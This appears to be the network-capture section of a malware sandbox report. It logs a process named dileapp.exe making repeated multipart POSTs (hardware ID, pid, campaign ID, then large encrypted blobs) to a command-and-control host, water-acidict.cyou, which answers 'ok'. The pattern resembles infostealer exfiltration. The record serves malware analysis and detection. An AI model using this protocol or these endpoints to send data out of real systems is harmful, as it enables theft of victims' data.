                                                                                                                                      2024-11-29 22:10:30 UTC1249OUTData Raw: 2d 2d 51 5a 46 35 55 43 48 52 41 46 34 34 4b 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 51 5a 46 35 55 43 48 52 41 46 34 34 4b 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 5a 46 35 55 43 48 52 41 46 34 34 4b 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 51 5a 46 35 55
                                                                                                                                      Data Ascii: --QZF5UCHRAF44KR9Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--QZF5UCHRAF44KR9Content-Disposition: form-data; name="pid"1--QZF5UCHRAF44KR9Content-Disposition: form-data; name="lid"c2CoW0--bandl--QZF5U
                                                                                                                                      2024-11-29 22:10:32 UTC1019INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:31 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=fmcmcvpgo4a3ofc2ho6js6kdl2; expires=Tue, 25-Mar-2025 15:57:10 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1lGNTo3%2BerZqRxdZYcXYwTf71EFGyq0OruSNpuH7VjYPnJuaf%2Bpp2bTe9zKANTbw20%2F0TizRwVvkz8%2FFMfSkjEI34HGuAovYpltesCX2XQmGP65gUgADL33K7jUHVoYzGiGmcz0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5eda0ad8b3338-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2030&rtt_var=771&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2165&delivery_rate=1410628&cwnd=245&unsent_bytes=0&cid=8b77127abebc9ae9&ts=1125&x=0"
                                                                                                                                      2024-11-29 22:10:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      21192.168.2.449768172.67.156.2174435448C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:31 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=IMXE4KHJEZ375T7
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 18350
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:31 UTC15331OUTData Raw: 2d 2d 49 4d 58 45 34 4b 48 4a 45 5a 33 37 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 49 4d 58 45 34 4b 48 4a 45 5a 33 37 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4d 58 45 34 4b 48 4a 45 5a 33 37 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 49 4d 58 45 34
                                                                                                                                      Data Ascii: --IMXE4KHJEZ375T7Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--IMXE4KHJEZ375T7Content-Disposition: form-data; name="pid"2--IMXE4KHJEZ375T7Content-Disposition: form-data; name="lid"c2CoW0--bandl--IMXE4
                                                                                                                                      2024-11-29 22:10:31 UTC3019OUTData Raw: 67 39 b2 fd cb d1 0e 65 9d 61 cd b4 aa aa a1 ff 06 ed 3a bc 4a 3a 3b e2 f5 e9 8b 6e 77 18 74 82 a0 b0 d1 ae 4e 72 af 6c 03 bb ef c0 70 76 68 70 6f b8 ab e0 81 89 d2 ce 70 34 95 3f d4 6e 77 97 74 7a df db 4a ab d9 3a a6 45 b3 54 7c 31 23 5d 55 db 3f 35 ab 59 2f 56 9a f4 45 bb 41 ec 02 5f 8c 47 52 99 43 fc b6 3f 53 d6 79 f9 f3 1a 0e ca ab 93 c8 9f 85 77 5e 16 97 be 18 eb 3d 73 d9 32 ab fe 33 c7 83 ce dc 49 e4 3f b3 1b ea ee a4 d7 a3 91 94 7c 88 af f8 cf ec 5e 94 ce 7e 2c e8 c4 3b 69 fc e7 a5 81 e9 5a 24 9a ba e3 0e 7a b3 b9 ed c8 7b 0f b6 d9 b0 b4 ae ef a3 5d ed c6 1f d3 ef f1 ea c5 f6 b4 94 f4 27 ee 0d 47 53 87 0e f1 bf 6d 76 32 b4 bd 6d a4 37 13 bb cf e9 a5 fc 85 8d f5 95 35 7a c0 7d 85 b5 0d 77 54 d1 d3 26 3b d7 a3 37 ae 53 a3 ed b8 29 da 67 13 8b f5 92
                                                                                                                                      Data Ascii: g9ea:J:;nwtNrlpvhpop4?nwtzJ:ET|1#]U?5Y/VEA_GRC?Syw^=s23I?|^~,;iZ$z{]'GSmv2m75z}wT&;7S)g
                                                                                                                                      2024-11-29 22:10:32 UTC1023INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:32 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=d7qjhi2lq9bm3rcgdtqo0pa3kg; expires=Tue, 25-Mar-2025 15:57:10 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eO2ZwrBM3WsYR7UFVBN%2BZWODHR1GKpM%2FjM0IEcEmhEIm9jrlt5Iu3mL3YN5p0jvpQ4o4kmImY0909gJW8iyiLvtqD77V7eZezXIXeBPxAhMqYd%2F0AYygtlcH70ebj4%2FbrLyCaBE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5eda1ced272aa-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2405&min_rtt=1847&rtt_var=1091&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19311&delivery_rate=1580942&cwnd=183&unsent_bytes=0&cid=8dfeb21749ad3526&ts=1052&x=0"
                                                                                                                                      2024-11-29 22:10:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      22192.168.2.449770172.67.156.2174435448C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:33 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=1E5MVDP3Y6
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8736
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:33 UTC8736OUTData Raw: 2d 2d 31 45 35 4d 56 44 50 33 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 31 45 35 4d 56 44 50 33 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 45 35 4d 56 44 50 33 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 31 45 35 4d 56 44 50 33 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                      Data Ascii: --1E5MVDP3Y6Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--1E5MVDP3Y6Content-Disposition: form-data; name="pid"2--1E5MVDP3Y6Content-Disposition: form-data; name="lid"c2CoW0--bandl--1E5MVDP3Y6Content-
                                                                                                                                      2024-11-29 22:10:34 UTC1019INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:34 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=ebrdhoo0g1e59cs70ga3451tcr; expires=Tue, 25-Mar-2025 15:57:13 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mg3po3O24nDeE7G3WTuvJ%2B%2FvRFwVWpU07Ynlj56BgXuOolJ7lSdoQvcf9ZSo1Sx7SqcCHi%2FmPUB08Bt4m3B2yTq4waXW91FdjXSJs2jNoD9uKh2w7nazxx8VeT%2FbdFlVJSE2WtY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5edb14c1743b2-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1714&rtt_var=857&sent=8&recv=16&lost=0&retrans=1&sent_bytes=4230&recv_bytes=9669&delivery_rate=161486&cwnd=236&unsent_bytes=0&cid=7e370a2e996b740d&ts=1049&x=0"
                                                                                                                                      2024-11-29 22:10:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      23192.168.2.449771172.67.156.2174437568C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:33 UTC286OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=P4W2BVQLSO4P2D6L4ED
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 305448
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: 2d 2d 50 34 57 32 42 56 51 4c 53 4f 34 50 32 44 36 4c 34 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 50 34 57 32 42 56 51 4c 53 4f 34 50 32 44 36 4c 34 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 34 57 32 42 56 51 4c 53 4f 34 50 32 44 36 4c 34 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61
                                                                                                                                      Data Ascii: --P4W2BVQLSO4P2D6L4EDContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--P4W2BVQLSO4P2D6L4EDContent-Disposition: form-data; name="pid"1--P4W2BVQLSO4P2D6L4EDContent-Disposition: form-data; name="lid"c2CoW0--ba
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: a7 00 e9 8d 85 d3 9a aa 36 4a 91 c0 a1 bb 61 8d 8e 14 42 0c 90 a1 0b 80 3c 93 6c 96 65 61 92 62 39 99 4d 76 6e 86 44 9d 11 d3 1c 49 03 6b 6c 5e 7b 44 20 ca cc 24 86 22 7d 2c 87 3f 18 c9 48 35 0e 7f d7 1e 49 2b ba dc 90 e9 0e ee 31 1f e3 a5 cc 35 b1 52 56 fd 01 b5 53 20 84 1d 1c 01 47 20 34 10 87 1e 53 45 00 e2 4d 98 5c 33 49 43 11 3f 57 ad 49 fd e9 f6 dc 61 2b e8 b2 15 e9 3e 34 b7 89 b7 b5 ce 2f 88 d4 f6 ed 3d c7 d4 c3 95 b6 8e b8 d7 bf 28 8c d3 7a 3e ff 54 f3 69 0c 4f 8a 01 77 b1 be 6b a7 60 db e5 74 1d 11 e3 cd a9 dc 9f a9 3e 1a 10 4e 0c b3 d0 5e 91 1e 3b 6e ad e1 eb 0d 26 77 d9 d6 e6 00 bc 5d 52 a9 bb 71 a7 a8 62 41 0f dc 15 84 cd 27 c0 d1 e0 1e b8 0d 43 a1 8b c5 21 8d 0f dd 83 60 65 f0 43 bb f6 f4 61 16 c7 96 8a 90 8f 08 c3 96 b4 50 f5 69 63 66 ba 81
                                                                                                                                      Data Ascii: 6JaB<leab9MvnDIkl^{D $"},?H5I+15RVS G 4SEM\3IC?WIa+>4/=(z>TiOwk`t>N^;n&w]RqbA'C!`eCaPicf
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: f6 ed 3d 04 7e 5f 9e 2c 2f e9 ab 03 2b 88 85 cb ff 5d 12 83 1f 86 71 06 3e f7 e6 39 ab 0a 59 7b 14 7a 95 26 02 28 18 2d 35 c0 f4 1c 91 b6 38 c0 c8 ba 93 15 76 13 f9 51 66 5a 37 5a 43 1d 8f 07 59 ea 98 ed 73 c8 ac 9e 5c fb 20 8c a5 55 30 3d 68 ce 40 6f e8 0d 81 4b 0f 40 9f 4e 2e b8 1f 71 52 e6 3e df c6 55 34 75 94 d9 7f 6f 96 61 62 98 5d 50 c6 21 40 22 bd 6e 97 01 f7 cd 63 36 07 06 77 01 09 4e a0 68 a6 e6 c8 81 1e 6b ab bc b2 be 6a 5b c3 bd 99 bf f3 02 84 e5 cd 13 97 f4 fd 0d 53 5c 68 2a 4a 6c ea 6d b0 4c 17 d4 98 90 bf 86 c8 b0 97 72 17 1c 77 53 35 a6 50 fa f1 27 37 49 f8 3e b0 dc 41 f9 ad 36 a4 04 13 50 c5 72 5c e2 2e 1f 74 5b c5 6f e5 5f b3 97 cd 8e bb dc ab ac 62 e5 b9 79 f0 47 02 18 84 60 9a d5 d7 ae 45 ac b3 9f 00 77 de b2 a0 88 38 2d 0e c3 35 5f 3f
                                                                                                                                      Data Ascii: =~_,/+]q>9Y{z&(-58vQfZ7ZCYs\ U0=h@oK@N.qR>U4uoab]P!@"nc6wNhkj[S\h*JlmLrwS5P'7I>A6Pr\.t[o_byG`Ew8-5_?
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: de a7 6d 26 d6 ea 1c df 9b 46 b9 f4 43 14 9d f5 15 a3 09 97 4e 22 5d 74 d4 71 a5 76 93 91 82 ae 78 74 93 18 dd 18 ec c7 cc 0b 15 c8 7b ca ab 6c c4 2d 61 8e 22 6d 8c 83 79 e4 55 86 6b a7 a2 56 d8 35 0c 48 5f bd ec 78 68 ec 8e fe 23 57 b0 34 fe ca 29 9d 90 5c ae d8 91 d8 e0 8b 6c 3a ab da 4c 49 11 36 29 5b 6d 27 1c 32 c9 4f f4 79 a5 05 3b b2 f7 17 94 b8 b1 75 89 c5 f9 ed a2 9f 98 9a ef 8e 5e d4 60 be 5a 49 e7 f2 20 b6 39 86 b9 f3 ee fd 67 cb a5 6f 89 99 64 01 01 8e db bf 79 ed 58 50 ff 9c d1 6f 93 ae 65 00 79 7b 59 5b 05 58 87 d8 39 51 b9 fd 19 11 b4 65 6b 7a 7b 91 61 b6 a5 5f 87 e2 bd f4 f6 ba 85 a2 52 15 c9 ed ee b8 dc 2d dc d5 76 f3 14 62 18 39 13 78 9d 89 9b e4 88 42 c7 79 c3 fc 24 37 ec 26 dc 38 03 2b 21 bf 2f a0 e2 fd df f5 63 8e ad 3a de ec 45 5d b4
                                                                                                                                      Data Ascii: m&FCN"]tqvxt{l-a"myUkV5H_xh#W4)\l:LI6)[m'2Oy;u^`ZI 9godyXPoey{Y[X9Qekz{a_R-vb9xBy$7&8+!/c:E]
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: 58 68 6b 5c 22 fd c2 ab 3a 6f 39 d1 be ce f2 83 24 73 a2 ed 6c 08 5b 73 7c 5f f1 ee b3 b7 ff 7d ad 91 41 0d 08 0e 5e fd 02 ad 6c a4 4d a3 1f 3f 2f a7 67 96 b3 39 fc 84 56 e2 49 4b 30 7c c7 9b 7a bd 87 03 59 d6 e8 ef a8 92 a5 2b 9c 37 57 b0 37 18 7c 25 81 7c 95 01 e5 f6 22 e1 f0 26 73 a5 93 e7 05 ef 31 fe d2 35 b3 8f b9 d6 51 86 bf 15 a4 f8 02 20 cb 42 5a a1 e7 2f 21 ac 4a 0e 25 b7 6d 36 ab b6 2f 80 3e 05 3a 7b 58 9a 9d fc 2c 3d 58 f9 c8 a0 9b 12 b0 62 13 4d 9a 61 9b ca 69 4d ea 03 da 85 57 b5 58 38 04 4f 24 ea 8a 8c 09 96 76 b7 48 32 82 6b dd 26 db f5 93 09 f2 ad 9d ce af 48 ad 09 25 3b e3 26 c9 43 49 3a 11 9a 1d e5 85 1a a0 c8 6d 30 ad af 50 ba 26 7f d1 c0 5e bf 9f 37 5e 8b 6b 5c aa 74 13 0c 57 cb 4e 5a dc 0f e6 1b 1d 96 53 5a 9e 73 c2 bb 34 b8 c3 a4 19
                                                                                                                                      Data Ascii: Xhk\":o9$sl[s|_}A^lM?/g9VIK0|zY+7W7|%|"&s15Q BZ/!J%m6/>:{X,=XbMaiMWX8O$vH2k&H%;&CI:m0P&^7^k\tWNZSZs4
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: 55 dc 51 cd ce 24 d0 c6 9a f9 98 c0 dc 6b 57 91 08 f1 4c 31 70 9e 88 d7 b6 78 7a bf 66 3e 0b 5a 69 f8 fb 13 3d 4e 50 38 f1 4d ab ea 25 81 78 bd 19 33 ac a0 dc 6f b5 b4 0e 02 b9 ee 04 07 e1 cd e4 de df 97 3b a3 6b 17 df 38 1f 7c 79 b9 13 f7 e1 e5 65 cd fb b9 ff 74 58 83 e3 02 a8 a3 8e d0 08 d0 bb c3 66 12 70 94 0f 4f 49 b4 2b d2 ae cd 32 90 69 c9 ca 1e a2 23 93 55 12 d3 6c c8 f6 84 01 c0 9a d8 f0 e4 05 02 ed d3 60 2b 2e 58 ee da eb 95 1e 66 7a 43 2b 91 6a e6 d5 f4 d1 f5 73 d6 64 bc e7 c3 d6 3d b3 d9 ec f5 28 18 aa 5d b8 50 68 4e 68 5e 78 55 6b dd 72 df 92 7e 46 88 a8 b8 a8 f0 e6 64 37 26 23 d4 74 d3 3c da d9 04 66 85 02 87 7c 77 bf ec db e0 c6 84 e8 92 dd ef fe 64 ea 6c e3 db 0b f2 2d 87 04 01 a9 df 24 49 69 20 65 d7 9a ac 2f 09 52 1d 36 fd 44 98 9f 4c 60
                                                                                                                                      Data Ascii: UQ$kWL1pxzf>Zi=NP8M%x3o;k8|yetXfpOI+2i#Ul`+.XfzC+jsd=(]PhNh^xUkr~Fd7&#t<f|wdl-$Ii e/R6DL`
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: 83 55 6c dc de a9 ad 5c 3a 92 f4 fe 39 72 8c 25 4e 90 e1 12 04 a1 10 f8 71 86 4d 97 19 fb 8e 9d 6f ea 75 30 64 d6 e5 95 94 da ca ed df a6 27 29 7a b5 d5 13 25 9c 04 d5 fd cb 02 8d 0f 68 2c 9e 52 5b 19 93 0f 01 96 4e 82 4f c5 f5 0d 86 1e ec 3b 64 a1 fa cd 47 c1 cf a5 29 16 fd e0 30 8c 90 79 43 e7 03 a8 42 62 c4 da 0f 1c c8 7f 3c 4c 30 f1 f2 3d a2 9e e4 31 6e be 96 b2 c3 d3 fb ae 46 66 da ae c3 c4 63 43 e9 11 fc bb 7f a6 7d 35 8a 3c 22 77 ee 6d b2 e7 d5 14 fa 25 25 57 cc fc 35 21 a4 37 bd e5 59 0e b0 e8 a7 e4 f4 b1 c3 84 27 3d dc b7 79 a5 9a 35 b4 a3 d2 27 6d 32 2f ca fc f6 7e 74 22 80 51 79 a1 d0 30 bb e8 f2 2c 6b cf 79 e5 16 06 11 bb b9 b5 8c 27 bb 0f e7 ac 19 b3 1f bf d3 2d 14 82 39 c7 35 bf 2a 68 5c 0d ab c8 0a bc 7f 29 88 97 09 13 c2 6a 33 17 ad 06 b4
                                                                                                                                      Data Ascii: Ul\:9r%NqMou0d')z%h,R[NO;dG)0yCBb<L0=1nFfcC}5<"wm%%W5!7Y'=y5'm2/~t"Qy0,ky'-95*h\)j3
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: 58 09 c8 61 79 8b ce fe 92 41 e5 7b 86 61 0e c2 4f 94 cc 19 6f 07 8f 64 e8 6b 04 36 05 7f ec f4 c5 01 f3 16 03 6f 3b 96 fc ae 26 62 e1 31 65 e7 05 ef 60 e0 8a 98 fc 57 2b 8a c2 8d 5c de 08 be 43 b8 cb 09 f9 5d c8 4d 28 b2 d5 7c 10 2f 4d 9b 7b 02 2c c5 e8 e1 6e c3 1f 50 ac 21 8b 0e 91 57 ce 82 7e 46 ca f6 20 47 72 c4 3b a8 d7 4b 29 70 9b c9 dc 20 ba 7c 07 6d 57 e0 26 73 65 e2 fe 03 31 e2 f4 a2 97 03 70 53 4c de 2d 97 27 dc e0 40 4e 4c 0d 22 77 df 78 4e d8 8a 20 7b 6c ef 01 2f 21 39 3c da a5 02 bf 0d 9b 9a 4d d2 90 80 7a ff 7a 7f 7b 7b 84 b9 39 5f ee 91 f3 ad ff 19 7f 2f aa f4 c3 df cd da 1b 33 df b9 ae 6c 6a 32 d7 3d e3 ba 00 38 b5 0d 2c ec f3 3c ac f0 2a da 7b 70 af 07 1c 76 f0 6b bc bd 75 49 82 c7 45 a9 1a 39 fb ca aa b6 2c c6 48 69 c7 2a f7 b2 81 f2 1f
                                                                                                                                      Data Ascii: XayA{aOodk6o;&b1e`W+\C]M(|/M{,nP!W~F Gr;K)p |mW&se1pSL-'@NL"wxN {l/!9<Mzz{{9_/3lj2=8,<*{pvkuIE9,Hi*
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: df c0 5d 9d 01 04 c2 31 58 7c 69 5b 87 fb d2 ce 8b 0d f4 7b 7f 6f e1 3e 86 bf f5 3d 6a ed d1 13 6c 41 57 87 10 26 13 98 df 64 72 f5 b1 5b 2d 5e 72 54 5d 2b fe 94 4f bf 48 25 12 d8 68 30 f9 ca e9 52 05 46 cf e5 5c f8 db 60 67 21 da 3e f6 86 ab 5c 10 b1 39 92 00 09 68 32 51 90 f2 f6 87 ea 74 bd 61 43 92 fa 6c 66 d8 1e 45 92 bd 78 38 eb d1 05 09 ea 8e 8c 67 f6 95 fa f2 b1 17 46 0f 9c 53 60 d2 0f 64 87 be bf cf 03 73 5d 0d 43 1f c5 fc b5 6d 0d 67 82 00 1c 6b 9f 0a 10 ef 5a 71 a1 ee d5 83 eb 99 6f 67 ea f2 63 72 0b 60 d2 19 74 fb 7d d5 73 5f 3b 0b 3d 0f 5f 36 0f 5f 4f 33 86 11 e7 4d c6 5d f4 08 30 6c 0f 3f 58 d7 f9 80 70 f6 f8 7e fe a7 4f 3e 6d 1e d0 9f e2 57 9b 99 79 6d cd 32 eb ad e3 4e 8d f8 52 ef 84 48 bb 58 23 65 fb b2 8d a8 23 aa 3a ad b6 60 ec 79 5a 7f
                                                                                                                                      Data Ascii: ]1X|i[{o>=jlAW&dr[-^rT]+OH%h0RF\`g!>\9h2QtaClfEx8gFS`ds]CmgkZqogcr`t}s_;=_6_O3M]0l?Xp~O>mWym2NRHX#e#:`yZ
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: f2 6c 5c 1b 3e 5b 2e b0 ba 99 fc 52 28 ac 77 d3 82 c1 52 d1 34 95 07 f0 b7 ef 70 7b c8 d8 5e 55 ae 5d 99 de 96 ce 6c 74 ef 18 69 ca 4d e4 f6 98 cb d8 d3 31 34 64 3e 78 e6 a8 32 33 f3 e1 17 e3 25 1e 31 25 9a ee cb 3c 55 86 c3 7c c4 b2 bb 64 84 27 2d 46 9b f7 11 7f 7b bf 7a ae b6 6e 7d 3c 3f 23 dc f3 a8 69 b6 cc ea 97 e3 bf a7 9d f5 cd e0 e0 7c d3 d1 27 57 06 fc 6a 3b b7 e6 21 ec e1 ab c0 0e df f3 ee 1e c3 04 12 e9 29 85 5e 93 c4 03 85 e1 4a 4b 7a eb 4b 22 da 86 5b 22 22 e1 c8 de 76 98 54 cb b7 d8 2d ee c2 30 5a 2b 88 91 13 bb 30 8d c5 ec be 82 c9 87 98 d5 14 43 f5 04 3d 55 5b a2 02 7d 72 68 a2 5d 98 ac 22 56 a6 73 9e 48 f8 73 d0 a6 e1 b3 83 2e 2b 7e 8f 47 1b cc 2f 19 f3 40 43 de bc ff 14 40 36 8d f7 e4 7f 45 37 8e 5e 53 ee 57 df 0c 6c c5 56 4f db 77 1a 02
                                                                                                                                      Data Ascii: l\>[.R(wR4p{^U]ltiM14d>x23%1%<U|d'-F{zn}<?#i|'Wj;!)^JKzK"[""vT-0Z+0C=U[}rh]"VsHs.+~G/@C@6E7^SWlVOw
